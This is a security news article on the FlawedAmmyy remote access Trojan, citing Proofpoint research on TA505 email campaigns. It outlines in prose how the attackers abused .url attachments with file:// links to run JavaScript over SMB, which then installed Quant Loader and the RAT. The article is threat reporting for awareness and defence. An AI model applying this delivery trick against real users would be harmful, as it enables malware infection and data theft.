FlawedAmmyy RAT Targets Users via Massive Email Campaigns


Security researchers have discovered the usage of a previously undocumented remote access Trojan (RAT) named FlawedAmmyy as the payload in recent massive email campaigns.

The trojan is based on leaked source code for Version 3 of the Ammyy Admin remote desktop software and includes features such as Remote Desktop control, File system manager, Proxy support, Audio Chat.

The complete remote control feature allows hackers complete access to the systems, ability to access a variety of services, steal files, credentials and much more.

Researchers from Proofpoint discovered it and said that “ FlawedAmmyy that has been used since the beginning of 2016 in both highly targeted email attacks as well as massive, multi-million message campaigns. Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014.”

The FlawedAmmyy trojan was seen as the payload in two recent massive email campaigns on March 5 and 6, 2018.

The messages were sent from addresses spoofing the recipient’s own domain and keeping subject line related to receipt, bills or invoices and contains a .zip file as the attachment.

The .zip file contains .url files which are intended to serve as links to websites and automatically launch the default web browser.

Here, in this case, the attacker used the URL to be a “file://” instead of an http:// link and because of this when the user opens the attachment the system downloads and executes a JavaScript over the SMB protocol instead of launching the web browser.

The javascript, in turn, downloads Quant Loader and then FlawedAmmyy RAT as the final payload.

You may be interested in reading: Triada Banking Trojan Found on 42 Models of Low-Cost Android Smartphones

According to researchers, the organisation behind the attack is TA505, a threat actor group which are previously responsible for targeting users with Dridex banking Trojan, Locky ransomware, Jaff ransomware, The Trick banking Trojan and many other large-scale attacks since 2014.

“For infected individuals, this means that attackers potentially have complete access to their PCs, giving threat actors the ability to access a variety of services, steal files and credentials, and much more.  We have seen FlawedAmmyy in both massive campaigns, potentially creating a large base of compromised computers, as well as targeted campaigns that create opportunities for actors to steal customer data, proprietary information, and more.” said in the blog post published in Proofpoint.


Please rate this content